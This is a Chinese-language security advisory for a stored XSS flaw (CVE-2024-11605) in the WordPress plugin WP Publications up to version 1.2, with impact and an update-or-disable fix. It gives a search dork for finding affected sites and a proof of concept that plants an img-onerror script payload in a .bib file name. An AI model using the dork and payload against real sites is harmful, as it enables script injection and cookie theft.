WordPress插件WP Publications <= 1.2 - 管理员存储型XSS漏洞
风险等级: 低
本地利用: 否
远程利用: 是
CVE编号: CVE-2024-11605
CWE编号: N/A
Dork语句: inurl:/wp-content/plugins/wp-publications/
漏洞详情
WordPress的WP Publications插件(版本<= 1.2)存在**存储型跨站脚本(XSS)**漏洞。该漏洞的产生原因是插件在将文件名输出到HTML之前未能进行转义处理,使得高权限用户(如管理员)能够注入任意JavaScript代码。
即使在WordPress配置中禁用unfiltered_html功能(例如多站点设置),此漏洞仍然可被利用。
概念验证(PoC)
-
通过SSH连接到服务器并导航到插件目录:
1cd /var/www/html/wp-content/plugins/wp-publications/ -
运行以下命令创建恶意的BibTeX文件:
1touch "<img src=x onerror=alert('XSS')>.bib" -
通过以下URL访问插件的BibTeX浏览器:
1https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib= -
注入的JavaScript代码将被执行,触发XSS有效载荷:
1alert('XSS');
影响范围
- 存储型XSS(JavaScript)在管理面板上下文中执行
- 在多站点环境中绕过
unfiltered_html保护 - 可用于权限提升、Cookie窃取或注入恶意内容
修复建议
更新到能够正确转义文件名后再输出的插件版本。如果没有可用更新,请禁用插件或手动清理文件输入。
参考链接: